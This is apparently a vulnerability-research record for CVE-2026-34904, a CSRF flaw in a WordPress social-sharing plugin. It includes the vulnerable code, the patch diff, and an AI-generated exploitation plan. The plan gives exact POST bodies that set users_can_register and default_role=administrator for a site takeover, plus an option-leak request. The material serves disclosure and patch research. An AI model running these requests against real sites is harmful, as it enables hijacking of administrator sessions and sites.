[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsxGRIC-PykMc7yepnye0HFgOKzo_-8rR9da8GeEGQHQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-34904","simple-social-media-share-buttons-social-sharing-for-everyone-cross-site-request-forgery","Simple Social Media Share Buttons – Social Sharing for Everyone \u003C= 6.2.0 - Cross-Site Request Forgery","The Simple Social Media Share Buttons – Social Sharing for Everyone plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.","simple-social-buttons",null,"\u003C=6.2.0","6.2.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-07 00:00:00","2026-04-15 19:49:38",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F39493083-e703-4893-b315-4e55df69276c?source=api-prod",9,[22,23,24],"lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php","readme.txt","simple-social-buttons.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-34904\n\n## 1. Vulnerability Summary\nThe **Simple Social Media Share Buttons** plugin (\u003C= 6.2.0) is vulnerable to **Cross-Site Request Forgery (CSRF)** due to missing nonce validation and capability checks in the `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php` file. This file is part of the WPBrigade SDK integrated into the plugin. It contains several POST request handlers that perform sensitive operations, most notably allowing the modification of arbitrary WordPress options via the `update_option` function.\n\n## 2. Attack Vector Analysis\n* **Target Endpoint**: An administrative page within the WordPress dashboard that includes the `wpb-debug.php` view. Based on the plugin's slug, this is typically accessed at `\u002Fwp-admin\u002Fadmin.php?page=simple-social-buttons&view=debug` or a similar SDK-injected route.\n* **Vulnerable Parameters**: \n * `set_option_name`: The name of the WordPress option to modify.\n * `option_value`: The new value for the specified option.\n * `load_option_name`: The name of an option to retrieve and display (Information Leak).\n* **Authentication**: Requires a victim with administrative privileges to be logged in and tricked into submitting a request (e.g., via an auto-submitting hidden form).\n* **Preconditions**: The plugin \"Simple Social Media Share Buttons\" must be active.\n\n## 3. Code Flow\n1. **Entry Point**: The administrator visits the plugin's debug page or is forced to send a POST request to the URL associated with the SDK's debug view.\n2. **File Inclusion**: The plugin (via the WPBrigade SDK) includes `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php`.\n3. **Processing**: At the top of `wpb-debug.php`, the code checks for POST parameters:\n ```php\n if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['set_option_name']) && isset($_POST['option_value'])) {\n $option_name = $_POST['set_option_name'];\n $option_value = $_POST['option_value'];\n custom_plugin_set_option($option_name, $option_value); \u002F\u002F Sink 1: update_option\n echo '\u003Cdiv id=\"success_message\">Successfully set the option\u003C\u002Fdiv>';\n }\n ```\n4. **Sink**: The function `custom_plugin_set_option` (defined in the same file) calls `update_option($option_name, $option_value)` without any permission or nonce checks.\n\n## 4. Nonce Acquisition Strategy\nAccording to the source code analysis, **no nonce validation is implemented** in the POST handlers within `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php`. \n* The code directly checks `$_SERVER['REQUEST_METHOD'] === 'POST'` and `isset($_POST['...'])`.\n* There is no call to `check_admin_referer()`, `check_ajax_referer()`, or `wp_verify_nonce()`.\n* **Conclusion**: No nonce is required for exploitation.\n\n## 5. Exploitation Strategy\nThe objective is to change critical WordPress settings to compromise the site. We will target the `users_can_register` and `default_role` options to allow the attacker to register a new administrator account.\n\n### Step 1: Enable Open Registration\n* **Action**: Update `users_can_register` to `1`.\n* **HTTP Tool**: `http_request`\n* **Method**: `POST`\n* **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=simple-social-buttons&view=debug`\n* **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body**: `set_option_name=users_can_register&option_value=1`\n\n### Step 2: Set Default Role to Administrator\n* **Action**: Update `default_role` to `administrator`.\n* **HTTP Tool**: `http_request`\n* **Method**: `POST`\n* **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=simple-social-buttons&view=debug`\n* **Body**: `set_option_name=default_role&option_value=administrator`\n\n### Step 3: (Optional\u002FIndicator) Change Site Title\n* **Action**: Change `blogname` to \"Hacked Site\".\n* **Body**: `set_option_name=blogname&option_value=Exploited`\n\n## 6. Test Data Setup\n1. Ensure the plugin is installed and activated: `wp plugin activate simple-social-buttons`.\n2. Ensure a standard administrator user exists to act as the victim (cookies must be captured or session simulated for the `http_request` tool).\n3. Verify the default state: `wp option get users_can_register` should be `0` and `wp option get default_role` should be `subscriber`.\n\n## 7. Expected Results\n* The response to the POST requests should contain the string: `Successfully set the option`.\n* The WordPress database options should be updated immediately.\n\n## 8. Verification Steps\nAfter executing the exploit via `http_request`, verify the changes using WP-CLI:\n1. `wp option get users_can_register` (Expected: `1`)\n2. `wp option get default_role` (Expected: `administrator`)\n3. `wp option get blogname` (Expected: `Exploited`)\n\n## 9. Alternative Approaches\nIf the `view=debug` parameter is incorrect or the SDK is mapped differently:\n* Use `browser_navigate` to `\u002Fwp-admin\u002Fadmin.php?page=simple-social-buttons` and inspect the \"Debug\" tab\u002Flink to find the exact URL.\n* If the \"Set DB Option\" form is hidden via JS, the `http_request` tool will still work as the backend PHP handler does not check for visibility.\n* Target the `load_option_name` parameter to leak the `wpb_sdk_module_id` or other sensitive keys:\n * **Body**: `load_option_name=admin_email`\n * **Expected**: The response will display the admin's email address in the `#result` div.","The Simple Social Media Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to and including 6.2.0. This is due to missing nonce validation and capability checks in the WPBrigade SDK's debug view, allowing unauthenticated attackers to modify arbitrary WordPress options if they can trick an administrator into performing an action such as clicking a link.","\u002F\u002F lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php:85\nfunction custom_plugin_set_option($option_name, $option_value)\n{\n update_option($option_name, $option_value);\n}\n\n\u002F\u002F Handle form submission to set option value\n\u002F\u002F lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php:91\nif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['set_option_name']) && isset($_POST['option_value'])) {\n $option_name = $_POST['set_option_name'];\n $option_value = $_POST['option_value'];\n\n custom_plugin_set_option($option_name, $option_value);\n\n echo '\u003Cdiv id=\"success_message\">Successfully set the option\u003C\u002Fdiv>';\n}\n\n---\n\n\u002F\u002F lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php:105\n\u002F\u002F Handle form submission to load option value\n$option_value = '';\n$result_visible = false;\n\nif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['load_option_name'])) {\n $option_name = $_POST['load_option_name'];\n $option_value = custom_plugin_get_option_value($option_name);\n $result_visible = true;\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsimple-social-buttons\u002F6.2.0\u002Flib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php\t2025-08-07 10:40:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsimple-social-buttons\u002F6.2.1\u002Flib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php\t2026-03-17 06:17:50.000000000 +0000\n@@ -1,333 +1,483 @@\n \u003C?php\n-\u002F\u002F Enqueue CSS file for admin debugging\n-function enqueue_custom_styles()\n-{\n- \u002F\u002F Enqueue the debug.css file from your plugin's directory\n- wp_enqueue_style('custom-debug-style', plugins_url('admin\u002Fcss\u002Fdebug.css', __FILE__));\n+\u002F**\n+ * WPB Debug view.\n+ *\n+ * HIGH RISK – Admin-only debug UI. Outputs sensitive data (keys, paths, user info).\n+ * Only load when is_admin(), manage_options, and WPBRIGADE_SDK__DEV_MODE are satisfied.\n+ *\n+ * @package Simple Social Buttons\n+ *\u002F\n+\n+if ( ! defined( 'ABSPATH' ) ) {\n+\texit;\n }\n-add_action('wp_enqueue_scripts', 'enqueue_custom_styles');\n \n+if ( ! is_admin() || ! current_user_can( 'manage_options' ) ) {\n+\twp_die(\n+\t\tesc_html__( 'You do not have permission to access this page.', 'simple-social-buttons' ),\n+\t\t'',\n+\t\tarray( 'response' => 403 )\n+\t);\n+}\n \n-$slug = get_option('wpb_sdk_module_slug');\n-$id = get_option('wpb_sdk_module_id');\n+if ( ! defined( 'WPBRIGADE_SDK__DEV_MODE' ) || true !== WPBRIGADE_SDK__DEV_MODE ) {\n+\twp_die(\n+\t\tesc_html__( 'Debug mode is not enabled.', 'simple-social-buttons' ),\n+\t\t'',\n+\t\tarray( 'response' => 403 )\n+\t);\n+}\n+\n+\u002F**\n+ * Verify POST request: method, capability, and nonce for a given action.\n+ *\u002F\n+function wpb_debug_verify_request( $action ) {\n+\tif ( ! isset( $_SERVER['REQUEST_METHOD'] ) || 'POST' !== $_SERVER['REQUEST_METHOD'] ) {\n+\t\treturn false;\n+\t}\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\treturn false;\n+\t}\n+\tif ( ! isset( $_POST['_wpnonce'] ) ) {\n+\t\treturn false;\n+\t}\n+\treturn (bool) wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ), $action );\n+}\n+\n+\u002F** Option name prefix allowed for Set DB Option (strict whitelist by prefix). *\u002F\n+define( 'WPB_DEBUG_OPTION_PREFIX', 'wpb_' );\n \n-\u002F\u002F Handle form submission to set option value\n-if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['set_option_name']) && isset($_POST['option_value'])) {\n- $option_name = $_POST['set_option_name'];\n- $option_value = $_POST['option_value'];\n-\n- custom_plugin_set_option($option_name, $option_value);\n+\u002F**\n+ * Set an option value only if it is in the allowed prefix scope.\n+ *\u002F\n+function wpb_debug_set_option( $option_name, $option_value ) {\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\treturn false;\n+\t}\n+\t$option_name = sanitize_text_field( $option_name );\n+\tif ( '' === $option_name || 0 !== strpos( $option_name, WPB_DEBUG_OPTION_PREFIX ) ) {\n+\t\treturn false;\n+\t}\n+\tupdate_option( $option_name, $option_value );\n+\treturn true;\n+}\n \n- echo '\u003Cdiv id=\"success_message\">Successfully set the option\u003C\u002Fdiv>';\n+$wpb_debug_set_option_success = false;\n+$wpb_debug_set_option_submitted = false;\n+if ( isset( $_POST['set_option_name'], $_POST['option_value'] ) && wpb_debug_verify_request( 'wpb_debug_set_option' ) ) {\n+\t$wpb_debug_set_option_submitted = true;\n+\t$option_name = sanitize_text_field( wp_unslash( $_POST['set_option_name'] ) );\n+\t$option_value = isset( $_POST['option_value'] ) ? sanitize_text_field( wp_unslash( $_POST['option_value'] ) ) : '';\n+\t$wpb_debug_set_option_success = wpb_debug_set_option( $option_name, $option_value );\n }","The exploit targets the plugin's debug view, which handles POST requests to update WordPress options without any nonce validation. An attacker can craft a hidden HTML form that sends a POST request to `\u002Fwp-admin\u002Fadmin.php?page=simple-social-buttons&view=debug`. The payload uses the `set_option_name` and `option_value` parameters to modify sensitive WordPress settings. For example, setting `users_can_register` to `1` and `default_role` to `administrator` allows an attacker to register their own administrative account. The attack requires a logged-in site administrator to visit a malicious website or click a specifically crafted link while their session is active.","gemini-3-flash-preview","2026-04-17 21:16:28","2026-04-17 21:17:00",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","6.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-social-buttons\u002Ftags\u002F6.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-social-buttons.6.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-social-buttons\u002Ftags\u002F6.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-social-buttons.6.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-social-buttons\u002Ftags"]